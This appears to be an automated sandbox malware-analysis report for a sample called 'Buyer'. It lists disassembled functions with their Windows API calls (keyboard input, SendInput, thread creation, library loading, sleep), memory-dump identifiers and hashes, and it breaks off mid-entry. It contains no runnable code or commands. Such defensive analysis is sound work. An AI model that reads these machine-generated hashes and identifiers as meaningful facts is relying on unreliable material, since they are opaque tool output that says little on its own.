                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3340791633-0
                                                                                                    • Opcode ID: 75a28d94edf5c3e9f8546c45a43f84dae185ad9eaea84696ca81f56e5df64fc3
                                                                                                    • Instruction ID: e56b856a94a9905025440be6f9fbdb6067255c2cd2886b85c497705a1a8fabdf
                                                                                                    • Opcode Fuzzy Hash: 75a28d94edf5c3e9f8546c45a43f84dae185ad9eaea84696ca81f56e5df64fc3
                                                                                                    • Instruction Fuzzy Hash: 1E318F35B5191CAFEB359A24CC85BE97B67AB44B60F1C4203FA11963E1C6399980BB81
                                                                                                    Function 00FAB29D Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00FAB2F2
                                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00FAB30E
                                                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00FAB375
                                                                                                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00FAB3C7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 432972143-0
                                                                                                    • Opcode ID: 213e60a2761874f436fc698ea1f430183edd284994d35db27e6ca670bc042878
                                                                                                    • Instruction ID: 0dc3bb17ba88a785bcc9955b1f840488b1364e93602a0d5eb656cb17b5f44898
                                                                                                    • Opcode Fuzzy Hash: 213e60a2761874f436fc698ea1f430183edd284994d35db27e6ca670bc042878
                                                                                                    • Instruction Fuzzy Hash: 0531D4B0D40758EEFF208B658C157FE7BB6AB4A320F04421AE485961D2C3788995EB91
                                                                                                    Function 00FAE5D6 Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F43914: _wcslen.LIBCMT ref: 00F43919
                                                                                                    • _wcslen.LIBCMT ref: 00FAE60C
                                                                                                    • _wcslen.LIBCMT ref: 00FAE623
                                                                                                    • _wcslen.LIBCMT ref: 00FAE64E
                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00FAE659
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$ExtentPoint32Text
                                                                                                    • String ID:
                                                                                                    • API String ID: 3763101759-0
                                                                                                    • Opcode ID: 167f446b9c041e22f98b550c39d78266dd6ef54bf97dcefa72d3d921f29305fa
                                                                                                    • Instruction ID: ff6af6cfae2c60abf9c02a206711bb473a7ef8261c92fef163f1bf5d16ea12b6
                                                                                                    • Opcode Fuzzy Hash: 167f446b9c041e22f98b550c39d78266dd6ef54bf97dcefa72d3d921f29305fa
                                                                                                    • Instruction Fuzzy Hash: 2121C9B1D00214AFCB10EFA8CD81BAEB7F8EF56760F144055E804FB345D6749E419BA1
                                                                                                    Function 00FD96B5 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F59DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F59DE2
                                                                                                    • GetCursorPos.USER32(?), ref: 00FD96ED
                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F97D21,?,?,?,?,?), ref: 00FD9702
                                                                                                    • GetCursorPos.USER32(?), ref: 00FD974A
                                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F97D21,?,?,?), ref: 00FD9780
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2864067406-0
                                                                                                    • Opcode ID: 484af23d4ba46572ee4cef08524c5e53806eab1f3f9db1df5766014ec14c3789
                                                                                                    • Instruction ID: b3c92281247d016258d1479075e44ffd3bc4e9139a3fa8a800355d2b9596d10a
                                                                                                    • Opcode Fuzzy Hash: 484af23d4ba46572ee4cef08524c5e53806eab1f3f9db1df5766014ec14c3789
                                                                                                    • Instruction Fuzzy Hash: 4821F135900108FFCF25AFA8C848EEA3BBBFB49360F184156FA0587261C3B59950FB50
                                                                                                    Function 00FAD8A6 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNEL32(?,00FDDB28), ref: 00FAD8E0
                                                                                                    • GetLastError.KERNEL32 ref: 00FAD8EF
                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00FAD8FE
                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00FDDB28), ref: 00FAD95B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 2267087916-0
                                                                                                    • Opcode ID: da074bcef2c7c2de8b1bcfc7140b903e1567901d83c43c9dc9aac1b503f920dd
                                                                                                    • Instruction ID: fa1e82d4565c906f4230ae8d937ed5236f0aaf90c7629745025e5d9438986b85
                                                                                                    • Opcode Fuzzy Hash: da074bcef2c7c2de8b1bcfc7140b903e1567901d83c43c9dc9aac1b503f920dd
                                                                                                    • Instruction Fuzzy Hash: 0121A6B19492059F8300DF24C88445F7BE8AE5B3A4F104A1AF4AAC72A1D730D946EB43
                                                                                                    Function 00FD2F40 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00FD2FC8
                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00FD2FE2
                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00FD2FF0
                                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00FD2FFE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long$AttributesLayered
                                                                                                    • String ID:
                                                                                                    • API String ID: 2169480361-0
                                                                                                    • Opcode ID: 01764cad76be99a64cd4a689a6f7767eee301e420b0cac951b89ac07d325a9bf
                                                                                                    • Instruction ID: 48f70f10b0f1ae2d9eeefdf0f31fb749373c152fd43d9e37f5e2d029bf5a1517
                                                                                                    • Opcode Fuzzy Hash: 01764cad76be99a64cd4a689a6f7767eee301e420b0cac951b89ac07d325a9bf
                                                                                                    • Instruction Fuzzy Hash: EB212831705111AFD7049B24CC54F6A7BAAEF85324F18855AF4268B3D2C775EC42EBD0
                                                                                                    Function 00FA2109 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00FA2129
                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FA213B
                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FA2151
                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FA216C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    • Opcode ID: 67508c1d1f755b5abb5932022f523df934559efa852cfdb9679c51d570db514b
                                                                                                    • Instruction ID: 6659e2e6eb795ad2c51c44df3d34a5a7b700a5230cce2a3b83a7a60728a9b5fb
                                                                                                    • Opcode Fuzzy Hash: 67508c1d1f755b5abb5932022f523df934559efa852cfdb9679c51d570db514b
                                                                                                    • Instruction Fuzzy Hash: EF110C76E01218FFDF119BA8CD85F9DBB79FB49750F200091EA01B7290D6716E11EB94
                                                                                                    Function 00FDA5DF Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F59DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F59DE2
                                                                                                    • GetClientRect.USER32(?,?), ref: 00FDA61D
                                                                                                    • GetCursorPos.USER32(?), ref: 00FDA627
                                                                                                    • ScreenToClient.USER32(?,?), ref: 00FDA632
                                                                                                    • DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00FDA666
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 4127811313-0
                                                                                                    • Opcode ID: 3d64b6a2ce7c152e27c387cf21fd72c012eba4b8add40f0046a570228a5f3e83
                                                                                                    • Instruction ID: da4e7a1465767716f4028d5eee8fa224a79e6013e13bcecec3b0c85503861ff4
                                                                                                    • Opcode Fuzzy Hash: 3d64b6a2ce7c152e27c387cf21fd72c012eba4b8add40f0046a570228a5f3e83
                                                                                                    • Instruction Fuzzy Hash: BB114832901119EBDB11EF68D8859EE7BBAFB04311F180452F902E3240D374EE81EBA6
                                                                                                    Function 00FAE817 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00FAE83E
                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00FAE871
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00FAE887
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00FAE88E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 2880819207-0
                                                                                                    • Opcode ID: 9eb6dc31d126e25b3b94989a051654d7f5d4df9f5781cf5fbad56773de673f86
                                                                                                    • Instruction ID: 350fd41c667038e3a3c5ae0eb47c4277dc252fb780503d58e7ca65465ccf1350
                                                                                                    • Opcode Fuzzy Hash: 9eb6dc31d126e25b3b94989a051654d7f5d4df9f5781cf5fbad56773de673f86
                                                                                                    • Instruction Fuzzy Hash: 6711DBB6D01259BFDB119FB89C08A9E7FADEB46320F148256F811D7280D67DCD04A7B1
                                                                                                    Function 00F6D51C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateThread.KERNEL32(00000000,?,00F6D349,00000000,00000004,00000000), ref: 00F6D568
                                                                                                    • GetLastError.KERNEL32 ref: 00F6D574
                                                                                                    • __dosmaperr.LIBCMT ref: 00F6D57B
                                                                                                    • ResumeThread.KERNEL32(00000000), ref: 00F6D599
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                    • String ID:
                                                                                                    • API String ID: 173952441-0
                                                                                                    • Opcode ID: 6288897e688dac42f8bb514da467eb82fded0da2a65ee944c877a6ca8126d791
                                                                                                    • Instruction ID: 3606f932bd763de8736d385db9c0bce2b35d7ce049ec250ac3d3e930872bf3fe
                                                                                                    • Opcode Fuzzy Hash: 6288897e688dac42f8bb514da467eb82fded0da2a65ee944c877a6ca8126d791
                                                                                                    • Instruction Fuzzy Hash: 5301D272E012187BDB206F65DC09BAE7B6DEF81735F14431AF929861D0DB748C00E7A2
                                                                                                    Function 00F466CB Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F46709
                                                                                                    • GetStockObject.GDI32(00000011), ref: 00F4671D
                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F46727
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3970641297-0
                                                                                                    • Opcode ID: 56d016544889a7b2c4f54d26dd72cdff4e8724b890ad5801bd0d85e8f02b0f00
                                                                                                    • Instruction ID: de809db1c3b9afe08d067faaf6a073368248cc1b347d653fcd76dd7eb9da55ec
                                                                                                    • Opcode Fuzzy Hash: 56d016544889a7b2c4f54d26dd72cdff4e8724b890ad5801bd0d85e8f02b0f00
                                                                                                    • Instruction Fuzzy Hash: CA11AD72502508BFEF124FA49C54EEABF6AEF093A8F000106FE0092010DB35DCA0FBA1
                                                                                                    Function 00F733C3 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00F7336A,00000364,00000000,00000000,00000000,?,00F735DB,00000006,FlsSetValue), ref: 00F733F5
                                                                                                    • GetLastError.KERNEL32(?,00F7336A,00000364,00000000,00000000,00000000,?,00F735DB,00000006,FlsSetValue,00FE3268,FlsSetValue,00000000,00000364,?,00F73196), ref: 00F73401
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00F7336A,00000364,00000000,00000000,00000000,?,00F735DB,00000006,FlsSetValue,00FE3268,FlsSetValue,00000000), ref: 00F7340F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3177248105-0
                                                                                                    • Opcode ID: 20db717b59c9d63275861feee6efd061af2f4cf00fbff1031873b574a9b2aa7d
                                                                                                    • Instruction ID: ebabb0722944fe70814288348e794ca4fd792972910f62b48ef73215f3dba67f
                                                                                                    • Opcode Fuzzy Hash: 20db717b59c9d63275861feee6efd061af2f4cf00fbff1031873b574a9b2aa7d
                                                                                                    • Instruction Fuzzy Hash: 11014C32A51236BBC736CF78AC44A563758AF057717104622F90DE3140C731D901B6E1
                                                                                                    Function 00FA7B5D Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00FA7B78
                                                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00FA7B90
                                                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00FA7BA5
                                                                                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00FA7BC3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 1352324309-0
                                                                                                    • Opcode ID: afe39a8da7207991bf8477239ffd5ab114da022c2f53de48dca007280e5b52fa
                                                                                                    • Instruction ID: d654e8f6d2b1f2486dfba4655c64915d71d5bddfce441c20a9c3addbefbf693f
                                                                                                    • Opcode Fuzzy Hash: afe39a8da7207991bf8477239ffd5ab114da022c2f53de48dca007280e5b52fa
                                                                                                    • Instruction Fuzzy Hash: C51161F524A3089BE720EF24DD08F927BFCEB41B40F10856AA556D6195D7B0F904EB60
                                                                                                    Function 00FAB7A9 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00FAB3D4,?,00008000), ref: 00FAB7C5
                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00FAB3D4,?,00008000), ref: 00FAB7EA
                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00FAB3D4,?,00008000), ref: 00FAB7F4
                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00FAB3D4,?,00008000), ref: 00FAB827
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 2875609808-0
                                                                                                    • Opcode ID: ab1d34772d65bbf7d8c1ac0f7e737c810d0c2907fb6968c418ddfb4b66fa763e
                                                                                                    • Instruction ID: 10796f581e6fda7a81b09bf3be572ff9e09b5742bbf320c8bac7051ccae362a6
                                                                                                    • Opcode Fuzzy Hash: ab1d34772d65bbf7d8c1ac0f7e737c810d0c2907fb6968c418ddfb4b66fa763e
                                                                                                    • Instruction Fuzzy Hash: 90117CB1C0161DEBDF009FA8D9486EEBF79FF0A311F014086D841B2146CB345A51EB91
                                                                                                    Function 00FD8500 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00FD851F
                                                                                                    • ScreenToClient.USER32(?,?), ref: 00FD8537
                                                                                                    • ScreenToClient.USER32(?,?), ref: 00FD855B
                                                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FD8576
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
